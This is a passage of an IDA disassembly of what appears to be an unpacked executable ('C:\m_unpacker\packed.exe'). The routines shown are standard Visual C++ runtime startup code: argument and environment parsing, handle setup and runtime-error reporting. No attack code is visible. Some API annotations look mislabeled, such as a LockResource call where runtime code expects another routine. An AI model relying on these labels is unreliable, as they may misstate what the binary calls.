; sub_41D0CB+AC�j ...
push ds:dword_4319DC
push 8
call ebx
pop ecx
mov ds:dword_4319DC, esi
pop ecx
pop esi
jmp short loc_41D1F3
; ---------------------------------------------------------------------------
loc_41D1EB: ; CODE XREF: sub_41D0CB+52�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_41D1F3: ; CODE XREF: sub_41D0CB+11E�j
mov eax, [ebp+arg_0]
mov ds:dword_4C9138, eax
loc_41D1FB: ; CODE XREF: sub_41D0CB+34�j
or eax, 0FFFFFFFFh
jmp short loc_41D209
; ---------------------------------------------------------------------------
loc_41D200: ; CODE XREF: sub_41D0CB+F�j
; sub_41D0CB+1A�j
push [ebp+arg_4]
call ds:dword_4221C0 ; UnhandledExceptionFilter
loc_41D209: ; CODE XREF: sub_41D0CB+2C�j
; sub_41D0CB+133�j
pop ebx
pop ebp
retn
sub_41D0CB endp
; =============== S U B R O U T I N E =======================================
sub_41D20C proc near ; CODE XREF: sub_41D0CB+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, ds:dword_4319D8
cmp ds:dword_431958, edx
push esi
mov eax, offset dword_431958
jz short loc_41D239
lea esi, [ecx+ecx*2]
lea esi, ds:431958h[esi*4]
loc_41D22E: ; CODE XREF: sub_41D20C+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_41D239
cmp [eax], edx
jnz short loc_41D22E
loc_41D239: ; CODE XREF: sub_41D20C+16�j
; sub_41D20C+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:431958h[ecx*4]
cmp eax, ecx
jnb short loc_41D24C
cmp [eax], edx
jz short locret_41D24E
loc_41D24C: ; CODE XREF: sub_41D20C+3A�j
xor eax, eax
locret_41D24E: ; CODE XREF: sub_41D20C+3E�j
retn
sub_41D20C endp
; =============== S U B R O U T I N E =======================================
sub_41D24F proc near ; CODE XREF: _0:00417DA9�p
cmp ds:dword_4CA714, 0
jnz short loc_41D25D
call sub_41CE11
loc_41D25D: ; CODE XREF: sub_41D24F+7�j
push esi
mov esi, ds:dword_4CA70C
mov al, [esi]
cmp al, 22h
jnz short loc_41D28F
loc_41D26A: ; CODE XREF: sub_41D24F+33�j
; sub_41D24F+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_41D287
test al, al
jz short loc_41D287
movzx eax, al
push eax
call sub_41F13C
test eax, eax
pop ecx
jz short loc_41D26A
inc esi
jmp short loc_41D26A
; ---------------------------------------------------------------------------
loc_41D287: ; CODE XREF: sub_41D24F+21�j
; sub_41D24F+25�j
cmp byte ptr [esi], 22h
jnz short loc_41D299
loc_41D28C: ; CODE XREF: sub_41D24F+52�j
inc esi
jmp short loc_41D299
; ---------------------------------------------------------------------------
loc_41D28F: ; CODE XREF: sub_41D24F+19�j
cmp al, 20h
jbe short loc_41D299
loc_41D293: ; CODE XREF: sub_41D24F+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_41D293
loc_41D299: ; CODE XREF: sub_41D24F+3B�j
; sub_41D24F+3E�j ...
mov al, [esi]
test al, al
jz short loc_41D2A3
cmp al, 20h
jbe short loc_41D28C
loc_41D2A3: ; CODE XREF: sub_41D24F+4E�j
mov eax, esi
pop esi
retn
sub_41D24F endp
; =============== S U B R O U T I N E =======================================
sub_41D2A7 proc near ; CODE XREF: _0:00417D92�p
push ebx
xor ebx, ebx
cmp ds:dword_4CA714, ebx
push esi
push edi
jnz short loc_41D2B9
call sub_41CE11
loc_41D2B9: ; CODE XREF: sub_41D2A7+B�j
mov esi, ds:dword_4C90D0
xor edi, edi
loc_41D2C1: ; CODE XREF: sub_41D2A7+30�j
mov al, [esi]
cmp al, bl
jz short loc_41D2D9
cmp al, 3Dh
jz short loc_41D2CC
inc edi
loc_41D2CC: ; CODE XREF: sub_41D2A7+22�j
push esi
call sub_415C80
pop ecx
lea esi, [esi+eax+1]
jmp short loc_41D2C1
; ---------------------------------------------------------------------------
loc_41D2D9: ; CODE XREF: sub_41D2A7+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_415D2F
mov esi, eax
pop ecx
cmp esi, ebx
mov ds:dword_4C90AC, esi
jnz short loc_41D2FB
push 9
call sub_417DFA
pop ecx
loc_41D2FB: ; CODE XREF: sub_41D2A7+4A�j
mov edi, ds:dword_4C90D0
cmp [edi], bl
jz short loc_41D33E
push ebp
loc_41D306: ; CODE XREF: sub_41D2A7+94�j
push edi
call sub_415C80
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_41D337
push ebp
call sub_415D2F
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_41D32A
push 9
call sub_417DFA
pop ecx
loc_41D32A: ; CODE XREF: sub_41D2A7+79�j
push edi
push dword ptr [esi]
call sub_415B90
pop ecx
add esi, 4
pop ecx
loc_41D337: ; CODE XREF: sub_41D2A7+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_41D306
pop ebp
loc_41D33E: ; CODE XREF: sub_41D2A7+5C�j
push ds:dword_4C90D0
call sub_415DE1
pop ecx
mov ds:dword_4C90D0, ebx
mov [esi], ebx
pop edi
pop esi
mov ds:dword_4CA710, 1
pop ebx
retn
sub_41D2A7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D360 proc near ; CODE XREF: _0:00417D8D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp ds:dword_4CA714, ebx
push esi
push edi
jnz short loc_41D377
call sub_41CE11
loc_41D377: ; CODE XREF: sub_41D360+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call ds:off_422060
mov eax, ds:dword_4CA70C
mov ds:off_4C90BC, esi
mov edi, esi
cmp [eax], bl
jz short loc_41D39C
mov edi, eax
loc_41D39C: ; CODE XREF: sub_41D360+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_41D3F9
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_415D2F
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_41D3CC
push 8
call sub_417DFA
pop ecx
loc_41D3CC: ; CODE XREF: sub_41D360+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_41D3F9
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov ds:dword_4C90A4, esi
pop edi
pop esi
mov ds:dword_4C90A0, eax
pop ebx
leave
retn
sub_41D360 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D3F9 proc near ; CODE XREF: sub_41D360+47�p
; sub_41D360+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_41D423
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41D423: ; CODE XREF: sub_41D3F9+20�j
cmp byte ptr [eax], 22h
jnz short loc_41D46C
loc_41D428: ; CODE XREF: sub_41D3F9+58�j
; sub_41D3F9+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_41D45A
test dl, dl
jz short loc_41D45A
movzx edx, dl
test ds:byte_4CA5E1[edx], 4
jz short loc_41D44D
inc dword ptr [ecx]
test esi, esi
jz short loc_41D44D
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_41D44D: ; CODE XREF: sub_41D3F9+46�j
; sub_41D3F9+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41D428
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41D428
; ---------------------------------------------------------------------------
loc_41D45A: ; CODE XREF: sub_41D3F9+36�j
; sub_41D3F9+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41D464
and byte ptr [esi], 0
inc esi
loc_41D464: ; CODE XREF: sub_41D3F9+65�j
cmp byte ptr [eax], 22h
jnz short loc_41D4AF
inc eax
jmp short loc_41D4AF
; ---------------------------------------------------------------------------
loc_41D46C: ; CODE XREF: sub_41D3F9+2D�j
; sub_41D3F9+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_41D477
mov dl, [eax]
mov [esi], dl
inc esi
loc_41D477: ; CODE XREF: sub_41D3F9+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test ds:byte_4CA5E1[ebx], 4
jz short loc_41D492
inc dword ptr [ecx]
test esi, esi
jz short loc_41D491
mov bl, [eax]
mov [esi], bl
inc esi
loc_41D491: ; CODE XREF: sub_41D3F9+91�j
inc eax
loc_41D492: ; CODE XREF: sub_41D3F9+8B�j
cmp dl, 20h
jz short loc_41D4A0
test dl, dl
jz short loc_41D4A4
cmp dl, 9
jnz short loc_41D46C
loc_41D4A0: ; CODE XREF: sub_41D3F9+9C�j
test dl, dl
jnz short loc_41D4A7
loc_41D4A4: ; CODE XREF: sub_41D3F9+A0�j
dec eax
jmp short loc_41D4AF
; ---------------------------------------------------------------------------
loc_41D4A7: ; CODE XREF: sub_41D3F9+A9�j
test esi, esi
jz short loc_41D4AF
and byte ptr [esi-1], 0
loc_41D4AF: ; CODE XREF: sub_41D3F9+6E�j
; sub_41D3F9+71�j ...
and [ebp+arg_10], 0
loc_41D4B3: ; CODE XREF: sub_41D3F9+19E�j
cmp byte ptr [eax], 0
jz loc_41D59C
loc_41D4BC: ; CODE XREF: sub_41D3F9+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_41D4C8
cmp dl, 9
jnz short loc_41D4CB
loc_41D4C8: ; CODE XREF: sub_41D3F9+C8�j
inc eax
jmp short loc_41D4BC
; ---------------------------------------------------------------------------
loc_41D4CB: ; CODE XREF: sub_41D3F9+CD�j
cmp byte ptr [eax], 0
jz loc_41D59C
test edi, edi
jz short loc_41D4E0
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_41D4E0: ; CODE XREF: sub_41D3F9+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_41D4E5: ; CODE XREF: sub_41D3F9+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_41D4EE: ; CODE XREF: sub_41D3F9+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_41D4F7
inc eax
inc ebx
jmp short loc_41D4EE
; ---------------------------------------------------------------------------
loc_41D4F7: ; CODE XREF: sub_41D3F9+F8�j
cmp byte ptr [eax], 22h
jnz short loc_41D528
test bl, 1
jnz short loc_41D526
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_41D515
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_41D515
mov eax, edx
jmp short loc_41D518
; ---------------------------------------------------------------------------
loc_41D515: ; CODE XREF: sub_41D3F9+10D�j
; sub_41D3F9+116�j
mov [ebp+arg_0], edi
loc_41D518: ; CODE XREF: sub_41D3F9+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_41D526: ; CODE XREF: sub_41D3F9+106�j
shr ebx, 1
loc_41D528: ; CODE XREF: sub_41D3F9+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_41D53D
inc ebx
loc_41D530: ; CODE XREF: sub_41D3F9+142�j
test esi, esi
jz short loc_41D538
mov byte ptr [esi], 5Ch
inc esi
loc_41D538: ; CODE XREF: sub_41D3F9+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_41D530
loc_41D53D: ; CODE XREF: sub_41D3F9+134�j
mov dl, [eax]
test dl, dl
jz short loc_41D58D
cmp [ebp+arg_10], 0
jnz short loc_41D553
cmp dl, 20h
jz short loc_41D58D
cmp dl, 9
jz short loc_41D58D
loc_41D553: ; CODE XREF: sub_41D3F9+14E�j
cmp [ebp+arg_0], 0
jz short loc_41D587
test esi, esi
jz short loc_41D576
movzx ebx, dl
test ds:byte_4CA5E1[ebx], 4
jz short loc_41D56F
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_41D56F: ; CODE XREF: sub_41D3F9+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_41D585
; ---------------------------------------------------------------------------
loc_41D576: ; CODE XREF: sub_41D3F9+162�j
movzx edx, dl
test ds:byte_4CA5E1[edx], 4
jz short loc_41D585
inc eax
inc dword ptr [ecx]
loc_41D585: ; CODE XREF: sub_41D3F9+17B�j
; sub_41D3F9+187�j
inc dword ptr [ecx]
loc_41D587: ; CODE XREF: sub_41D3F9+15E�j
inc eax
jmp loc_41D4E5
; ---------------------------------------------------------------------------
loc_41D58D: ; CODE XREF: sub_41D3F9+148�j
; sub_41D3F9+153�j ...
test esi, esi
jz short loc_41D595
and byte ptr [esi], 0
inc esi
loc_41D595: ; CODE XREF: sub_41D3F9+196�j
inc dword ptr [ecx]
jmp loc_41D4B3
; ---------------------------------------------------------------------------
loc_41D59C: ; CODE XREF: sub_41D3F9+BD�j
; sub_41D3F9+D5�j
test edi, edi
jz short loc_41D5A3
and dword ptr [edi], 0
loc_41D5A3: ; CODE XREF: sub_41D3F9+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_41D3F9 endp
; =============== S U B R O U T I N E =======================================
sub_41D5AD proc near ; CODE XREF: _0:00417D83�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_4C9240
push ebx
push ebp
mov ebp, ds:dword_42203C
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_41D5FB
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_41D5DC
mov ds:dword_4C9240, 1
jmp short loc_41D604
; ---------------------------------------------------------------------------
loc_41D5DC: ; CODE XREF: sub_41D5AD+21�j
call ds:dword_422040 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_41D6D6
mov ds:dword_4C9240, 2
jmp loc_41D68A
; ---------------------------------------------------------------------------
loc_41D5FB: ; CODE XREF: sub_41D5AD+19�j
cmp eax, 1
jnz loc_41D685
loc_41D604: ; CODE XREF: sub_41D5AD+2D�j
cmp esi, ebx
jnz short loc_41D614
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_41D6D6
loc_41D614: ; CODE XREF: sub_41D5AD+59�j
cmp [esi], bx
mov eax, esi
jz short loc_41D629
loc_41D61B: ; CODE XREF: sub_41D5AD+73�j
; sub_41D5AD+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_41D61B
inc eax
inc eax
cmp [eax], bx
jnz short loc_41D61B
loc_41D629: ; CODE XREF: sub_41D5AD+6C�j
sub eax, esi
mov edi, ds:dword_422130
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_41D67A
push ebp
call sub_415D2F
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_41D67A
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_41D676
push [esp+18h+var_8]
call sub_415DE1
pop ecx
mov [esp+18h+var_8], ebx
loc_41D676: ; CODE XREF: sub_41D5AD+B9�j
mov ebx, [esp+18h+var_8]
loc_41D67A: ; CODE XREF: sub_41D5AD+99�j
; sub_41D5AD+A8�j
push esi
call ds:dword_4221C8 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_41D6D8
; ---------------------------------------------------------------------------
loc_41D685: ; CODE XREF: sub_41D5AD+51�j
cmp eax, 2
jnz short loc_41D6D6
loc_41D68A: ; CODE XREF: sub_41D5AD+49�j
cmp edi, ebx
jnz short loc_41D69A
call ds:dword_422040 ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_41D6D6
loc_41D69A: ; CODE XREF: sub_41D5AD+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_41D6AA
loc_41D6A0: ; CODE XREF: sub_41D5AD+F6�j
; sub_41D5AD+FB�j
inc eax
cmp [eax], bl
jnz short loc_41D6A0
inc eax
cmp [eax], bl
jnz short loc_41D6A0
loc_41D6AA: ; CODE XREF: sub_41D5AD+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_415D2F
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_41D6C0
xor esi, esi
jmp short loc_41D6CB
; ---------------------------------------------------------------------------
loc_41D6C0: ; CODE XREF: sub_41D5AD+10D�j
push ebp
push edi
push esi
call sub_415560
add esp, 0Ch
loc_41D6CB: ; CODE XREF: sub_41D5AD+111�j
push edi
call ds:dword_4221C4 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_41D6D8
; ---------------------------------------------------------------------------
loc_41D6D6: ; CODE XREF: sub_41D5AD+39�j
; sub_41D5AD+61�j ...
xor eax, eax
loc_41D6D8: ; CODE XREF: sub_41D5AD+D6�j
; sub_41D5AD+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_41D5AD endp
; =============== S U B R O U T I N E =======================================
sub_41D6DF proc near ; CODE XREF: _0:00417D73�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_415D2F
mov esi, eax
pop ecx
test esi, esi
jnz short loc_41D6FF
push 1Bh
call sub_417DFA
pop ecx
loc_41D6FF: ; CODE XREF: sub_41D6DF+16�j
mov ds:dword_4CA3C0, esi
mov ds:dword_4CA4C0, 20h
lea eax, [esi+100h]
loc_41D715: ; CODE XREF: sub_41D6DF+52�j
cmp esi, eax
jnb short loc_41D733
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, ds:dword_4CA3C0
add esi, 8
add eax, 100h
jmp short loc_41D715
; ---------------------------------------------------------------------------
loc_41D733: ; CODE XREF: sub_41D6DF+38�j
lea eax, [esp+54h+var_44]
push eax
call ds:dword_422180 ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_41D80F
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_41D80F
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_41D769
mov esi, eax
loc_41D769: ; CODE XREF: sub_41D6DF+86�j
cmp ds:dword_4CA4C0, esi
jge short loc_41D7C3
mov edi, offset dword_4CA3C4
loc_41D776: ; CODE XREF: sub_41D6DF+DA�j
push 100h
call sub_415D2F
test eax, eax
pop ecx
jz short loc_41D7BD
add ds:dword_4CA4C0, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_41D794: ; CODE XREF: sub_41D6DF+CF�j
cmp eax, ecx
jnb short loc_41D7B0
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_41D794
; ---------------------------------------------------------------------------
loc_41D7B0: ; CODE XREF: sub_41D6DF+B7�j
add edi, 4
cmp ds:dword_4CA4C0, esi
jl short loc_41D776
jmp short loc_41D7C3
; ---------------------------------------------------------------------------
loc_41D7BD: ; CODE XREF: sub_41D6DF+A4�j
mov esi, ds:dword_4CA4C0
loc_41D7C3: ; CODE XREF: sub_41D6DF+90�j
; sub_41D6DF+DC�j
xor edi, edi
test esi, esi
jle short loc_41D80F
loc_41D7C9: ; CODE XREF: sub_41D6DF+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_41D806
mov cl, [ebp+0]
test cl, 1
jz short loc_41D806
test cl, 8
jnz short loc_41D7E8
push eax
call ds:dword_422030 ; GetFileType
test eax, eax
jz short loc_41D806
loc_41D7E8: ; CODE XREF: sub_41D6DF+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4CA3C0[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_41D806: ; CODE XREF: sub_41D6DF+EF�j
; sub_41D6DF+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_41D7C9
loc_41D80F: ; CODE XREF: sub_41D6DF+65�j
; sub_41D6DF+71�j ...
xor ebx, ebx
loc_41D811: ; CODE XREF: sub_41D6DF+195�j
mov eax, ds:dword_4CA3C0
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_41D86C
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_41D82C
push 0FFFFFFF6h
pop eax
jmp short loc_41D836
; ---------------------------------------------------------------------------
loc_41D82C: ; CODE XREF: sub_41D6DF+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_41D836: ; CODE XREF: sub_41D6DF+14B�j
push eax
call ds:dword_422034 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_41D85B
push edi
call ds:dword_422030 ; GetFileType
test eax, eax
jz short loc_41D85B
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_41D861
loc_41D85B: ; CODE XREF: sub_41D6DF+163�j
; sub_41D6DF+16E�j
or byte ptr [esi+4], 40h
jmp short loc_41D870
; ---------------------------------------------------------------------------
loc_41D861: ; CODE XREF: sub_41D6DF+17A�j
cmp eax, 3
jnz short loc_41D870
or byte ptr [esi+4], 8
jmp short loc_41D870
; ---------------------------------------------------------------------------
loc_41D86C: ; CODE XREF: sub_41D6DF+13E�j
or byte ptr [esi+4], 80h
loc_41D870: ; CODE XREF: sub_41D6DF+180�j
; sub_41D6DF+185�j ...
inc ebx
cmp ebx, 3
jl short loc_41D811
push ds:dword_4CA4C0
call ds:dword_422038 ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_41D6DF endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D894 proc near ; DATA XREF: _0:00417D0E�o
; sub_41B111+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41D934
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41D8C7: ; CODE XREF: sub_41D894+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41D92D
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41D91B
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41D91B
js short loc_41D926
mov edi, [ebx+8]
push ebx
call sub_416348
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_41638A
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_41641E
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41D91B: ; CODE XREF: sub_41D894+40�j
; sub_41D894+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41D8C7
; ---------------------------------------------------------------------------
loc_41D926: ; CODE XREF: sub_41D894+54�j
mov eax, 0
jmp short loc_41D949
; ---------------------------------------------------------------------------
loc_41D92D: ; CODE XREF: sub_41D894+36�j
mov eax, 1
jmp short loc_41D949
; ---------------------------------------------------------------------------
loc_41D934: ; CODE XREF: sub_41D894+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_41638A
add esp, 8
pop ebp
mov eax, 1
loc_41D949: ; CODE XREF: sub_41D894+97�j
; sub_41D894+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41D894 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_41638A
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_41D96C proc near ; CODE XREF: sub_417DFA+9�p
; sub_417E1F+9�p
mov eax, ds:dword_4C90D8
cmp eax, 1
jz short loc_41D983
test eax, eax
jnz short locret_41D9A4
cmp ds:dword_42F354, 1
jnz short locret_41D9A4
loc_41D983: ; CODE XREF: sub_41D96C+8�j
push 0FCh
call sub_41D9A5
mov eax, ds:dword_4C9244
pop ecx
test eax, eax
jz short loc_41D999
call eax
loc_41D999: ; CODE XREF: sub_41D96C+29�j
push 0FFh
call sub_41D9A5
pop ecx
locret_41D9A4: ; CODE XREF: sub_41D96C+C�j
; sub_41D96C+15�j
retn
sub_41D96C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D9A5 proc near ; CODE XREF: sub_417DFA+12�p
; sub_417E1F+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_4319E8
loc_41D9B8: ; CODE XREF: sub_41D9A5+20�j
cmp edx, [eax]
jz short loc_41D9C7
add eax, 8
inc ecx
cmp eax, offset off_431A78
jl short loc_41D9B8
loc_41D9C7: ; CODE XREF: sub_41D9A5+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, ds:dword_4319E8[esi]
jnz loc_41DAF5
mov eax, ds:dword_4C90D8
cmp eax, 1
jz loc_41DACF
test eax, eax
jnz short loc_41D9F8
cmp ds:dword_42F354, 1
jz loc_41DACF
loc_41D9F8: ; CODE XREF: sub_41D9A5+44�j
cmp edx, 0FCh
jz loc_41DAF5
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call ds:off_422060
test eax, eax
jnz short loc_41DA2F
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_415B90
pop ecx
pop ecx
loc_41DA2F: ; CODE XREF: sub_41D9A5+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_415C80
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_41DA72
lea eax, [ebp+var_1A4]
push eax
call sub_415C80
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_416D30
add esp, 10h
loc_41DA72: ; CODE XREF: sub_41D9A5+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_415B90
lea eax, [ebp+var_A0]
push edi
push eax
call sub_415BA0
lea eax, [ebp+var_A0]
push offset asc_422B90 ; "\n\n"
push eax
call sub_415BA0
push ds:off_4319EC[esi]
lea eax, [ebp+var_A0]
push eax
call sub_415BA0
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_41F17E
add esp, 2Ch
pop edi
jmp short loc_41DAF5
; ---------------------------------------------------------------------------
loc_41DACF: ; CODE XREF: sub_41D9A5+3C�j
; sub_41D9A5+4D�j
lea eax, [ebp+arg_0]
lea esi, off_4319EC[esi]
push 0
push eax
push dword ptr [esi]
call sub_415C80
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_422034 ; GetStdHandle
push eax
call ds:dword_4220B0 ; WriteFile
loc_41DAF5: ; CODE XREF: sub_41D9A5+2E�j
; sub_41D9A5+59�j ...
pop esi
leave
retn
sub_41D9A5 endp
; =============== S U B R O U T I N E =======================================
sub_41DAF8 proc near ; CODE XREF: sub_417E43+6C�p
; sub_41C368+32�p ...
arg_0 = dword ptr 4
inc ds:dword_4C9248
push 1000h
call sub_415D2F
pop ecx
mov ecx, [esp+arg_0]
test eax, eax
mov [ecx+8], eax
jz short loc_41DB21
or dword ptr [ecx+0Ch], 8
mov dword ptr [ecx+18h], 1000h
jmp short loc_41DB32
; ---------------------------------------------------------------------------
loc_41DB21: ; CODE XREF: sub_41DAF8+1A�j
or dword ptr [ecx+0Ch], 4
lea eax, [ecx+14h]
mov [ecx+8], eax
mov dword ptr [ecx+18h], 2
loc_41DB32: ; CODE XREF: sub_41DAF8+27�j
mov eax, [ecx+8]
and dword ptr [ecx+4], 0
mov [ecx], eax
retn
sub_41DAF8 endp
; =============== S U B R O U T I N E =======================================
sub_41DB3C proc near ; CODE XREF: sub_417E43+61�p
; sub_4189C2+8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, ds:dword_4CA4C0
